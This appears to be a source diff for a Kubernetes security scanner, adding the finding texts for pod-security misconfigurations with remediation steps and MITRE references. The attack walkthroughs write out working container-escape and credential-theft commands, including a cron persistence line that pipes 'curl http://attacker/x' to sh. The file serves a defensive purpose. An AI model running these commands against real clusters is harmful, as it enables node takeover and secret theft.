+		Impact:           content.Impact,
+		AttackScenario:   content.AttackScenario,
+		Evidence:         evidenceBytes,
+		Remediation:      content.Remediation,
+		RemediationSteps: content.RemediationSteps,
+		References:       references,
+		LearnMore:        content.LearnMore,
+		MitreTechniques:  content.MitreTechniques,
+		Tags:             []string{"module:pod_security", "check:" + check},
+	})
 }
 
 // appendFinding deduplicates by Finding.ID before appending.

--- a/internal/analyzer/podsec/content.go
+++ b/internal/analyzer/podsec/content.go
@@ -1,0 +1,498 @@
+// Content for pod-security findings. Each rule has a builder that takes runtime context (workload
+// kind/namespace/name, container name, hostPath path) and returns an enriched ruleContent with
+// scope-aware language, an attacker walkthrough, ordered remediation steps, and structured
+// references / MITRE technique citations.
+//
+// Sources: Kubernetes Pod Security Standards, NSA/CISA Kubernetes Hardening Guide v1.2, MITRE
+// ATT&CK Containers matrix, Microsoft Threat Matrix for Kubernetes, Bishop Fox Bad Pods, KubeHound,
+// Aqua Security writeups, Quarkslab "HostPath: Love-Hate Relationship", The Grey Corner containerd
+// research, Christophe Tafani-Dereeper "Stop worrying about allowPrivilegeEscalation".
+package podsec
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/hardik/kubesplaining/internal/models"
+)
+
+// ruleContent bundles every enriched field a podsec rule emits.
+type ruleContent struct {
+	Title            string
+	Scope            models.Scope
+	Description      string
+	Impact           string
+	AttackScenario   []string
+	Remediation      string
+	RemediationSteps []string
+	LearnMore        []models.Reference
+	MitreTechniques  []models.MitreTechnique
+}
+
+// scopeForWorkload returns the per-workload scope. DaemonSets are flagged because their blast
+// radius is "every node" — surface that in the Detail string so reviewers see it immediately.
+func scopeForWorkload(kind, namespace, name string) models.Scope {
+	level := models.ScopeWorkload
+	detail := fmt.Sprintf("Workload `%s/%s/%s`", kind, namespace, name)
+	if kind == "DaemonSet" {
+		detail += " — runs on **every** node (per-node blast radius)"
+	}
+	if strings.HasPrefix(namespace, "kube-") {
+		detail += " — control-plane namespace"
+	}
+	return models.Scope{Level: level, Detail: detail}
+}
+
+// MITRE technique objects shared across podsec rules.
+var (
+	mitreT1611     = models.MitreTechnique{ID: "T1611", Name: "Escape to Host", URL: "https://attack.mitre.org/techniques/T1611/"}
+	mitreT1610     = models.MitreTechnique{ID: "T1610", Name: "Deploy Container", URL: "https://attack.mitre.org/techniques/T1610/"}
+	mitreT1068     = models.MitreTechnique{ID: "T1068", Name: "Exploitation for Privilege Escalation", URL: "https://attack.mitre.org/techniques/T1068/"}
+	mitreT1552_001 = models.MitreTechnique{ID: "T1552.001", Name: "Unsecured Credentials in Files", URL: "https://attack.mitre.org/techniques/T1552/001/"}
+	mitreT1552_005 = models.MitreTechnique{ID: "T1552.005", Name: "Cloud Instance Metadata API", URL: "https://attack.mitre.org/techniques/T1552/005/"}
+	mitreT1057     = models.MitreTechnique{ID: "T1057", Name: "Process Discovery", URL: "https://attack.mitre.org/techniques/T1057/"}
+	mitreT1046     = models.MitreTechnique{ID: "T1046", Name: "Network Service Discovery", URL: "https://attack.mitre.org/techniques/T1046/"}
+	mitreT1040     = models.MitreTechnique{ID: "T1040", Name: "Network Sniffing", URL: "https://attack.mitre.org/techniques/T1040/"}
+	mitreT1543     = models.MitreTechnique{ID: "T1543", Name: "Create or Modify System Process", URL: "https://attack.mitre.org/techniques/T1543/"}
+	mitreT1083     = models.MitreTechnique{ID: "T1083", Name: "File and Directory Discovery", URL: "https://attack.mitre.org/techniques/T1083/"}
+	mitreT1548_001 = models.MitreTechnique{ID: "T1548.001", Name: "Setuid and Setgid", URL: "https://attack.mitre.org/techniques/T1548/001/"}
+	mitreT1525     = models.MitreTechnique{ID: "T1525", Name: "Implant Internal Image", URL: "https://attack.mitre.org/techniques/T1525/"}
+	mitreT1195_002 = models.MitreTechnique{ID: "T1195.002", Name: "Compromise Software Supply Chain", URL: "https://attack.mitre.org/techniques/T1195/002/"}
+	mitreT1554     = models.MitreTechnique{ID: "T1554", Name: "Compromise Host Software Binary", URL: "https://attack.mitre.org/techniques/T1554/"}
+	mitreT1078     = models.MitreTechnique{ID: "T1078", Name: "Valid Accounts", URL: "https://attack.mitre.org/techniques/T1078/"}
+	mitreT1528     = models.MitreTechnique{ID: "T1528", Name: "Steal Application Access Token", URL: "https://attack.mitre.org/techniques/T1528/"}
+	mitreT1005     = models.MitreTechnique{ID: "T1005", Name: "Data from Local System", URL: "https://attack.mitre.org/techniques/T1005/"}
+)
+
+var (
+	refPSS             = models.Reference{Title: "Kubernetes — Pod Security Standards", URL: "https://kubernetes.io/docs/concepts/security/pod-security-standards/"}
+	refPSA             = models.Reference{Title: "Kubernetes — Pod Security Admission", URL: "https://kubernetes.io/docs/concepts/security/pod-security-admission/"}
+	refSecurityContext = models.Reference{Title: "Kubernetes — Configure a Security Context for a Pod or Container", URL: "https://kubernetes.io/docs/tasks/configure-pod-container/security-context/"}
+	refNSAHardening    = models.Reference{Title: "NSA/CISA Kubernetes Hardening Guide v1.2 (PDF)", URL: "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF"}
+	refBadPods         = models.Reference{Title: "Bishop Fox — Bad Pods: Kubernetes Pod Privilege Escalation", URL: "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation"}
+)
+
+func contentEscape001(kind, namespace, name, container string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("Privileged container `%s` in `%s/%s/%s`", container, kind, namespace, name),
+		Scope: scope,
+		Description: fmt.Sprintf("Container `%s` in `%s/%s/%s` is configured with `securityContext.privileged: true`. A privileged container retains every Linux capability (CAP_SYS_ADMIN, CAP_SYS_MODULE, CAP_NET_ADMIN, etc.), bypasses all Linux Security Module profiles (AppArmor/SELinux), runs without the default seccomp profile, and shares `/dev` with the host. From the kernel's perspective it is indistinguishable from a process running directly on the node.\n\n"+
+			"This is the single most dangerous PodSpec setting: capability drops, read-only root filesystem, and `runAsNonRoot` are all neutralised because the container can simply remount, reload kernel modules, or call `setuid(0)`. The Pod Security Standards explicitly forbid privileged containers at both Baseline and Restricted levels.\n\n"+
+			"Real-world breakout: an attacker with code execution loads a kernel module with `insmod` (CAP_SYS_MODULE), or uses `mknod` to recreate `/dev/sda1`, mounts the host root, and writes to `/root/.ssh/authorized_keys`. Public exploit tooling (`deepce`, `kdigger -ac`, `kubeletmein`) automates these in seconds.",
+			container, kind, namespace, name),
+		Impact: "Full root on the host node — read every Secret on the node, exfiltrate the kubelet client certificate, schedule pods anywhere, and pivot to other nodes.",
+		AttackScenario: []string{
+			"Attacker gains code execution inside the privileged pod (RCE, malicious image, SSRF→shell).",
+			"They confirm the configuration with `kdigger dig admission` or `deepce.sh`.",
+			"They mount the host filesystem: `mkdir /host && mount /dev/sda1 /host`.",
+			"They steal kubelet credentials from `/host/var/lib/kubelet/pki/kubelet-client-current.pem` or write `/host/root/.ssh/authorized_keys`.",
+			"With kubelet creds they list every Pod and Secret on the node, then escalate to cluster-admin via the cgroup-release-agent technique or `nsenter -t 1 -a`.",
+		},
+		Remediation: "Remove `privileged: true` and explicitly grant only the Linux capabilities the workload actually needs.",
+		RemediationSteps: []string{
+			"Audit why the container needs privileged — most apps do not. Trace which capability is actually required (often only `NET_BIND_SERVICE`).",
+			"Replace `privileged: true` with `capabilities.drop: [ALL]` and an explicit `capabilities.add: [<NEEDED_CAP>]`. Add `allowPrivilegeEscalation: false`, `readOnlyRootFilesystem: true`, `runAsNonRoot: true`, and `seccompProfile.type: RuntimeDefault`.",
+			"Enforce at admission time: label the namespace `pod-security.kubernetes.io/enforce: baseline` (or `restricted`) so future regressions are blocked.",
+			fmt.Sprintf("Validate with `kubectl get %s/%s -n %s -o jsonpath='{.spec.template.spec.containers[*].securityContext.privileged}'` returning empty/false.", strings.ToLower(kind), name, namespace),
+		},
+		LearnMore: []models.Reference{refPSS, refPSA, refSecurityContext, refNSAHardening, refBadPods,
+			{Title: "RBT Security — Breaking Out of Privileged Containers", URL: "https://www.rbtsec.com/blog/kubernetes-penetration-testing-part-three-breaking-out-with-privileged-containers/"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1610, mitreT1068},
+	}
+}
+
+func contentEscape002(kind, namespace, name string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("Pod shares host PID namespace (`hostPID: true`) — `%s/%s/%s`", kind, namespace, name),
+		Scope: scope,
+		Description: fmt.Sprintf("Workload `%s/%s/%s` sets `spec.hostPID: true`, joining the host's PID namespace. Every process on the node — kubelet, container runtime, other tenant workloads, sshd, cloud-init agents — is visible via `/proc` and addressable by PID from inside this pod.\n\n"+
+			"The risk is twofold. First, information disclosure: `/proc/<pid>/environ`, `/proc/<pid>/cmdline`, and `/proc/<pid>/root/...` leak environment variables (which often contain database passwords, cloud credentials, and Kubernetes service-account tokens), CLI args, and arbitrary file contents from other containers' rootfs. Second, when combined with CAP_SYS_PTRACE or `privileged: true`, an attacker can `nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash` and land directly in the host's mount namespace as root.\n\n"+
+			"Bishop Fox's `bad-pods` library and `kdigger`'s `processes` bucket grep `/proc/*/environ` for `AWS_`, `KUBE_`, `DATABASE_URL`, and service-account JWTs. Even without extra capabilities, host-PID alone is enough to harvest cleartext credentials from neighboring pods on the same node — a classic noisy-neighbor escalation primitive (TeamTNT, Hildegard).",
+			kind, namespace, name),
+		Impact: "Read process arguments, environment variables, and `/proc/<pid>/root` of every other pod on the node; harvest service-account tokens and cloud credentials from neighbors.",
+		AttackScenario: []string{
+			"Gain code execution in the pod with `hostPID: true`.",
+			"Enumerate processes: `ps -ef` shows host kubelet, runc, and sibling containers.",
+			"Loot environments: `for p in /proc/[0-9]*/environ; do tr '\\0' '\\n' < $p; done | grep -iE 'token|secret|aws|key'`.",
+			"Read other pods' service-account tokens via `cat /proc/<pid>/root/var/run/secrets/kubernetes.io/serviceaccount/token`.",
+			"If CAP_SYS_PTRACE or privileged is also present, `nsenter -t 1 -a` to land in the host root namespace and persist via SSH key or systemd unit.",
+		},
+		Remediation: "Set `spec.hostPID: false` (or omit it — defaults to false).",
+		RemediationSteps: []string{
+			"Identify why hostPID was set; legitimate uses are limited to node-monitoring DaemonSets like node-exporter.",
+			"Remove `hostPID: true` from the pod template (or set explicitly to `false`).",
+			"Apply Pod Security Admission `baseline`: `kubectl label ns <ns> pod-security.kubernetes.io/enforce=baseline`.",
+			fmt.Sprintf("Validate with `kubectl get %s/%s -n %s -o jsonpath='{.spec.template.spec.hostPID}'` returning empty or `false`.", strings.ToLower(kind), name, namespace),
+		},
+		LearnMore: []models.Reference{refPSS, refPSA, refBadPods, refNSAHardening,
+			{Title: "CIS Kubernetes Benchmark 5.2.2 — Minimize containers sharing host PID", URL: "https://www.cisecurity.org/benchmark/kubernetes"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1552_001, mitreT1057},
+	}
+}
+
+func contentEscape003(kind, namespace, name string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("Pod shares host network (`hostNetwork: true`) — `%s/%s/%s`", kind, namespace, name),
+		Scope: scope,
+		Description: fmt.Sprintf("Workload `%s/%s/%s` sets `spec.hostNetwork: true`. The container is no longer in a sandboxed network namespace — it sees the node's interfaces, listens on the node's IPs and ports, and reaches every loopback service the kubelet talks to.\n\n"+
+			"The most dangerous consequence is that NetworkPolicies cannot apply. Cilium, Calico, and the upstream NetworkPolicy spec key off the pod's veth and labels — a hostNetwork pod has neither, so all egress filtering is silently bypassed. On managed Kubernetes (EKS/GKE/AKS) the workload can reach the cloud Instance Metadata Service at `169.254.169.254` even when the cluster has set IMDSv2 hop-count protection. The result is a one-step path from container RCE to AWS/Azure/GCP IAM credential theft.\n\n"+
+			"The pod can also bind privileged ports the host already uses, redirect kube-proxy, sniff service traffic, or scan internal-only addresses such as `127.0.0.1:10250` (kubelet) which is otherwise unreachable from a normal pod.",
+			kind, namespace, name),
+		Impact: "Bypasses NetworkPolicy and IMDSv2 hop protection; container reaches cloud metadata, kubelet localhost, and any node-loopback service — pivots cluster compromise into cloud-account compromise.",
+		AttackScenario: []string{
+			"Gain code execution in the pod (web RCE, malicious image).",
+			"Confirm hostNetwork: `ip addr` shows the node's primary interface, not a pod CIDR.",
+			"Hit the IMDS: `curl -s http://169.254.169.254/latest/api/token -X PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 21600'` then fetch `iam/security-credentials/<role>`.",
+			"Use stolen IAM creds with `aws sts get-caller-identity` and pivot to S3/EKS API.",
+			"Optional: probe `127.0.0.1:10250` (kubelet) — if anonymous auth, run `curl -k https://127.0.0.1:10250/pods` to enumerate every pod on the node and exec into any of them.",
+		},
+		Remediation: "Set `hostNetwork: false` (default) and route any node-level networking through a CNI-managed Service or NetworkPolicy-aware DaemonSet.",
+		RemediationSteps: []string{
+			"Audit if hostNetwork is required — typically only kube-proxy, CNI agents, or node-local DNS legitimately need it.",
+			"Remove `hostNetwork: true`. If a host port is genuinely required, prefer a Service of type NodePort or an Ingress controller behind a NetworkPolicy.",
+			"Enforce IMDSv2 with hop-limit = 1 on every node; apply an egress NetworkPolicy denying `169.254.169.254/32` for application namespaces.",
+			fmt.Sprintf("Validate: `kubectl get %s/%s -n %s -o jsonpath='{.spec.template.spec.hostNetwork}'` is empty/false; `kubectl exec ... -- curl -m 2 http://169.254.169.254/` should fail.", strings.ToLower(kind), name, namespace),
+		},
+		LearnMore: []models.Reference{refPSS,
+			{Title: "Datadog Security Labs — Attacking EKS cloud identities", URL: "https://securitylabs.datadoghq.com/articles/amazon-eks-attacking-securing-cloud-identities/"},
+			{Title: "Wiz — Lateral movement: from container to cloud takeover", URL: "https://www.wiz.io/blog/lateral-movement-risks-in-the-cloud-and-how-to-prevent-them-part-2-from-k8s-clust"},
+			{Title: "Microsoft Threat Matrix — Access cloud resources", URL: "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Access%20cloud%20resources/"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1552_005, mitreT1046, mitreT1040},
+	}
+}
+
+func contentEscape004(kind, namespace, name string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("Pod shares host IPC (`hostIPC: true`) — `%s/%s/%s`", kind, namespace, name),
+		Scope: scope,
+		Description: fmt.Sprintf("Workload `%s/%s/%s` sets `spec.hostIPC: true`, joining the host's IPC (Inter-Process Communication) namespace. The container can read and write the host's POSIX shared-memory segments (`/dev/shm`), SysV shared memory, message queues, and semaphore arrays.\n\n"+
+			"The attack surface is data, not code execution. Many host-resident processes — caching layers, GPU compute (CUDA's `cuMemAlloc`), Redis with `unixsocket`, Postgres' shared buffers, even kernel-side IMA logs — store in-memory state in IPC segments under the assumption no untrusted process can address them. With `hostIPC: true` an attacker dumps every visible segment, harvests cached secrets, replays message queues, or corrupts semaphores to cause denial-of-service.\n\n"+
+			"Bishop Fox's `bad-pods/hostipc` example uses `ipcs -m` to list shared-memory segments and `ipcs -p` to identify owning PIDs, then `cat /dev/shm/*` (or attaches via `shmat`) to extract their contents. hostIPC is forbidden by the Pod Security Standards Baseline level.",
+			kind, namespace, name),
+		Impact: "Read or modify shared memory and SysV IPC of every process on the node; leak in-memory secrets, GPU buffers, database caches; denial-of-service via semaphore corruption.",
+		AttackScenario: []string{
+			"Gain code execution in the pod with hostIPC enabled.",
+			"Enumerate IPC: `ipcs -a` lists shared-memory IDs, message queues, and semaphores.",
+			"Dump `/dev/shm`: `ls -la /dev/shm; for f in /dev/shm/*; do strings \"$f\" | grep -iE 'token|secret|key'; done`.",
+			"Attach to a SysV segment with a small program (`shmat(shmid, 0, SHM_RDONLY)`) and exfiltrate.",
+			"If a co-tenant runs an in-memory cache (Redis without disk persistence, an ML inference engine), extract model weights or session tokens still resident.",
+		},
+		Remediation: "Set `hostIPC: false` (default).",
+		RemediationSteps: []string{
+			"Confirm no legitimate IPC sharing requirement; very few application workloads need this — typically only NVIDIA GPU sharing or some HPC workloads.",
+			"Remove `hostIPC: true` from the pod template.",
+			"Where shared memory is a feature need (containers cooperating), use a single Pod with multiple containers and an `emptyDir { medium: Memory }` volume instead of host IPC.",
+			fmt.Sprintf("Validate: `kubectl get %s/%s -n %s -o jsonpath='{.spec.template.spec.hostIPC}'` is empty/false.", strings.ToLower(kind), name, namespace),
+		},
+		LearnMore: []models.Reference{refPSS, refBadPods,
+			{Title: "Bishop Fox — badPods/hostipc", URL: "https://github.com/BishopFox/badPods/blob/main/manifests/hostipc/README.md"},
+			{Title: "Elastic Security — Kubernetes Pod Created With HostIPC", URL: "https://www.elastic.co/guide/en/security/8.19/kubernetes-pod-created-with-hostipc.html"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1552_001, mitreT1005},
+	}
+}
+
+func contentEscape005(kind, namespace, name, volumeName string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("Docker socket mounted into `%s/%s/%s` (volume `%s` → `/var/run/docker.sock`)", kind, namespace, name, volumeName),
+		Scope: scope,
+		Description: fmt.Sprintf("Workload `%s/%s/%s` mounts the Docker UNIX socket `/var/run/docker.sock` from the node into the container (volume `%s`). The Docker daemon listens on this socket as root and exposes the entire Docker Engine API — including `POST /containers/create`, which lets any client launch a new container with arbitrary mounts, devices, capabilities, and host-namespace settings.\n\n"+
+			"Mounting docker.sock is equivalent to giving the workload an unrestricted root shell on the node. There is no permission boundary inside the Docker API; \"read-only\" mount of the socket file does not help because the socket is a request channel, not a stored object — once you can `connect()` to it, you can issue any command. The OWASP Docker Security Cheat Sheet calls this the top-priority anti-pattern, and HackTricks documents the breakout as a one-liner.\n\n"+
+			"From inside the container, install the Docker CLI (or use `curl --unix-socket`) and run `docker run -v /:/host --privileged --pid=host -it alpine chroot /host`. The new container mounts the host root, runs as host root, and can drop a backdoor into `/etc/cron.d/`, steal `/var/lib/kubelet/pki/`, or `nsenter -t 1 -a` to land on the host directly.",
+			kind, namespace, name, volumeName),
+		Impact: "Equivalent to root on the node — launch any container with any mount, mount the host filesystem, steal kubelet certs, and pivot to the entire cluster.",
+		AttackScenario: []string{
+			"Gain code execution in the pod with docker.sock mounted.",
+			"Verify: `ls -la /var/run/docker.sock; curl --unix-socket /var/run/docker.sock http://localhost/version`.",
+			"Spawn a privileged container that mounts host root: `docker run -it --rm -v /:/host alpine chroot /host /bin/sh`.",
+			"Read kubelet client cert: `cat /host/var/lib/kubelet/pki/kubelet-client-current.pem` and use it to talk to the apiserver as `system:node:<nodeName>`.",
+			"Persist by writing an SSH key to `/host/root/.ssh/authorized_keys` or installing a systemd service.",
+		},
+		Remediation: "Remove the docker.sock hostPath mount; do not run sibling-container patterns on Kubernetes.",
+		RemediationSteps: []string{
+			"Identify why the workload talks to Docker — usually a CI runner, log shipper, or build system. Replace with a Kubernetes-native alternative: Buildah/Kaniko/Buildkit-rootless for builds, the Kubernetes API for pod orchestration, fluent-bit's tail input for logs.",
+			"Remove the `hostPath: /var/run/docker.sock` volume and corresponding `volumeMount`.",
+			"Apply Pod Security Admission `baseline` to the namespace (forbids hostPath volumes) and/or use a Kyverno/OPA policy that explicitly denies this path.",
+			fmt.Sprintf("Validate: `kubectl get %s/%s -n %s -o jsonpath='{.spec.template.spec.volumes}' | jq` should not contain `/var/run/docker.sock`.", strings.ToLower(kind), name, namespace),
+		},
+		LearnMore: []models.Reference{
+			{Title: "OWASP Docker Security Cheat Sheet — Rule #1", URL: "https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html"},
+			{Title: "HackTricks — Abusing Docker Socket for Privilege Escalation", URL: "https://hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html"},
+			{Title: "Quarkslab — Why exposing the Docker socket is a really bad idea", URL: "https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html"},
+			refPSS,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1610, mitreT1068},
+	}
+}
+
+func contentContainerdSocket001(kind, namespace, name, volumeName string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("Containerd socket mounted into `%s/%s/%s` (volume `%s`)", kind, namespace, name, volumeName),
+		Scope: scope,
+		Description: fmt.Sprintf("Workload `%s/%s/%s` mounts containerd's UNIX socket (`/run/containerd/containerd.sock` or `/var/run/containerd/containerd.sock`) into the container via volume `%s`. Containerd runs as root and is the runtime the kubelet uses to start every pod on the node — if you can talk to its API, you can create, modify, or exec into any container on the host, including kube-system control-plane pods.\n\n"+
+			"This is the modern equivalent of the docker.sock anti-pattern. Since Kubernetes 1.24 removed dockershim, most clusters use containerd or CRI-O directly; the same breakout primitives apply but the tooling differs (`ctr`, `crictl`). Kubernetes places its containers under containerd namespace `k8s.io` — `ctr -n k8s.io containers list` enumerates every pod on the node.\n\n"+
+			"The Grey Corner's containerd-socket-exploitation series documents the one-liner: install or copy the `ctr` binary, then run `ctr --address /run/containerd/containerd.sock -n k8s.io run --rm --mount type=bind,src=/,dst=/host,options=rbind:rw --privileged docker.io/library/alpine:latest pwn /bin/sh`. The result is a privileged container with `/` mounted at `/host`. From there an attacker reads the kubelet client cert, dumps every pod's secrets, or `task exec`s a reverse shell into the apiserver static pod on a control-plane node.",
+			kind, namespace, name, volumeName),
+		Impact: "Root on the node and arbitrary code execution inside any container on the node, including kube-system static pods. Equivalent to compromising the kubelet itself.",
+		AttackScenario: []string{
+			"Code execution in the pod with containerd.sock mounted.",
+			"`ls -la /run/containerd/containerd.sock; ctr --address /run/containerd/containerd.sock version`.",
+			"List target containers: `ctr -n k8s.io containers list` — note kube-apiserver, etcd, or any victim app.",
+			"Spawn a privileged escape container: `ctr -n k8s.io run --rm --privileged --mount type=bind,src=/,dst=/host,options=rbind:rw docker.io/library/alpine:latest x /bin/sh -c 'chroot /host'`.",
+			"From host, harvest `/var/lib/kubelet/pki/kubelet-client-current.pem` and pivot to the API server.",
+		},
+		Remediation: "Remove the containerd-socket hostPath mount; use the Kubernetes API or CRI-aware tools instead.",
+		RemediationSteps: []string{
+			"Determine why the workload needs CRI access. Legitimate use is rare — typically only specific node-agent observability tools. Replace with a Kubernetes-API-driven alternative.",
+			"Remove the hostPath volume and volumeMount targeting `/run/containerd/containerd.sock` (and aliases).",
+			"For monitoring use cases, use the kubelet's `/metrics/cadvisor` endpoint behind an RBAC-scoped ServiceAccount, not raw socket access.",
+			fmt.Sprintf("Validate: `kubectl get %s/%s -n %s -o yaml | grep -i containerd` returns no socket mount.", strings.ToLower(kind), name, namespace),
+		},
+		LearnMore: []models.Reference{
+			{Title: "The Grey Corner — containerd socket exploitation part 1", URL: "https://thegreycorner.com/2025/02/12/containerd-socket-exploitation-part-1.html"},
+			{Title: "containerd ctr(8) man page", URL: "https://manpages.debian.org/testing/containerd/ctr.8.en.html"},
+			refPSS,
+			{Title: "Microsoft Threat Matrix — Container service account", URL: "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1610, mitreT1068},
+	}
+}
+
+func contentEscape006(kind, namespace, name, volumeName string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("Root filesystem (`/`) mounted from host into `%s/%s/%s`", kind, namespace, name),
+		Scope: scope,
+		Description: fmt.Sprintf("Workload `%s/%s/%s` mounts the host's root filesystem (`hostPath: /`) inside the container via volume `%s`. Combined with the container's UID (typically root), this exposes the entire node filesystem — kubelet credentials, every other pod's mounted secrets, the container runtime state, and on control-plane nodes the static-pod manifests under `/etc/kubernetes/manifests`.\n\n"+
+			"Mounting `/` is one of the few configurations that, by itself, guarantees host compromise without requiring a CVE, kernel exploit, or even the `privileged` flag. The kubelet stores per-pod secrets at `/var/lib/kubelet/pods/<uid>/volumes/kubernetes.io~secret/<name>/...` in cleartext (tmpfs); a read-only host-root mount is enough to copy them all out. A read-write mount turns this into trivial persistence: write to `/etc/cron.d/`, modify `/etc/sudoers`, drop a shared-object into `/etc/ld.so.preload`, or — on a control-plane node — drop a malicious manifest into `/etc/kubernetes/manifests/` which the kubelet then runs as a static pod with full privileges.\n\n"+
+			"A single command sequence — `chroot /host`, `cat /host/var/lib/kubelet/pki/kubelet-client-current.pem`, then `kubectl --kubeconfig=<crafted> get secrets -A` — yields full secret enumeration on every pod on the node. Public exploit aids (`kubeletmein`, `peirates`) automate the chain.",
+			kind, namespace, name, volumeName),
+		Impact: "Read every secret on the node; write to host cron, SSH, kubelet PKI, or static-pod manifests; persistence and pivot to cluster-admin.",
+		AttackScenario: []string{
+			"RCE in the pod that mounts `/` at `/host`.",
+			"Steal kubelet creds: `cp /host/var/lib/kubelet/pki/kubelet-client-current.pem /tmp/k.pem`.",
+			"Enumerate other pods' secrets: `find /host/var/lib/kubelet/pods -path '*/kubernetes.io~secret/*' -type f -exec cat {} \\;`.",
+			"Persist: `echo '* * * * * root curl http://attacker/x|sh' > /host/etc/cron.d/k8s` (RW) or, on a control-plane node, `cp evil-pod.yaml /host/etc/kubernetes/manifests/`.",
+			"With kubelet creds, run `kubectl --client-certificate=/tmp/k.pem ...` and harvest cluster secrets.",
+		},
+		Remediation: "Never mount `/` from the node. Use specific subpaths or projected volumes if absolutely required.",
+		RemediationSteps: []string{
+			"Identify the actual file or directory the workload needs and replace the mount with the narrowest possible path (and `readOnly: true`).",
+			"Where possible, replace hostPath entirely with a CSI-backed volume, ConfigMap, Secret, or projected volume.",
+			"Apply Pod Security Admission `baseline` to the namespace (forbids hostPath). For unavoidable cases, allowlist via Kyverno/Gatekeeper that pins the path and `readOnly: true`.",
+			fmt.Sprintf("Validate: `kubectl get %s/%s -n %s -o jsonpath='{.spec.template.spec.volumes[*].hostPath.path}'` does not contain `/`.", strings.ToLower(kind), name, namespace),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — Volumes (hostPath)", URL: "https://kubernetes.io/docs/concepts/storage/volumes/#hostpath"},
+			refPSS,
+			{Title: "Quarkslab — Kubernetes and HostPath: a Love-Hate Relationship", URL: "https://blog.quarkslab.com/kubernetes-and-hostpath-a-love-hate-relationship.html"},
+			refBadPods,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1552_001, mitreT1543},
+	}
+}
+
+func contentEscape008(kind, namespace, name, volumeName string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("`/var/log` mounted from host into `%s/%s/%s` — log-symlink escape primitive", kind, namespace, name),
+		Scope: scope,
+		Description: fmt.Sprintf("Workload `%s/%s/%s` mounts `/var/log` from the host via volume `%s`. This directory is the canonical container-log staging area: the kubelet writes per-pod logs into `/var/log/pods/<ns>_<pod>_<uid>/<container>/0.log` as symlinks pointing to the runtime's actual log files.\n\n"+
+			"The exploit is that `kubectl logs` causes the kubelet (running as root) to read those symlinks. If a pod can write into the host's `/var/log` (because it has the directory mounted), it can replace its own `0.log` symlink with one pointing to ANY file on the node, e.g. `/etc/shadow` or `/var/lib/kubelet/pki/kubelet-client-current.pem`. The next `kubectl logs <pod>` returns the contents of that file as if it were the container's stdout. This is the well-known `/var/log` symlink escape (Aqua Security, KubeHound `CE_VAR_LOG_SYMLINK`, CVE-2017-1002101, CVE-2021-25741).\n\n"+
+			"The pattern is very common in misconfigured log shippers (Fluentd, Filebeat, Promtail). On multi-tenant clusters where any user can `kubectl logs` against pods they own, this is a universal arbitrary-file-read primitive.",
+			kind, namespace, name, volumeName),
+		Impact: "Arbitrary file read on the host node as root via the kubelet's log-resolving behavior; compromise kubelet PKI, /etc/shadow, etcd snapshots, every pod's mounted secrets.",
+		AttackScenario: []string{
+			"RCE in a pod that has `hostPath: /var/log` mounted (RW).",
+			"Find own pod's log-symlink directory: `ls -la /var/log/pods/`.",
+			"Replace `0.log` symlink: `ln -sf /etc/shadow /var/log/pods/<ns>_<pod>_<uid>/<container>/0.log`.",
+			"Trigger the read: `kubectl logs <pod> -c <container>` returns `/etc/shadow`.",
+			"Repeat for kubelet PKI and pivot via direct apiserver auth as `system:node:<nodeName>`.",
+		},
+		Remediation: "Do not mount `/var/log` (or its subdirectories) from the host into application pods; use the kubelet logs API or a log-aggregator sidecar pattern.",
+		RemediationSteps: []string{
+			"For log-shipper DaemonSets that genuinely need host logs, switch to read-only mount AND restrict to `/var/log/containers` and `/var/log/pods` only (not the parent `/var/log`).",
+			"Configure the log shipper to refuse following symlinks (e.g. Fluent Bit `Path_Key`) and run as a non-root UID.",
+			"For application pods, route logs to stdout/stderr only — Kubernetes captures these without any hostPath. Drop the hostPath mount.",
+			fmt.Sprintf("Validate: `kubectl get %s/%s -n %s -o yaml | grep -A2 hostPath` does not contain `/var/log` (or only narrow read-only sub-path).", strings.ToLower(kind), name, namespace),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Aqua Security — Kubernetes Pod Escape Using Log Mounts", URL: "https://www.aquasec.com/blog/kubernetes-security-pod-escape-log-mounts/"},
+			{Title: "KubeHound — CE_VAR_LOG_SYMLINK", URL: "https://kubehound.io/reference/attacks/CE_VAR_LOG_SYMLINK/"},
+			{Title: "CVE-2021-25741 — Symlink exchange host filesystem access", URL: "https://github.com/kubernetes/kubernetes/issues/104980"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1552_001, mitreT1083},
+	}
+}
+
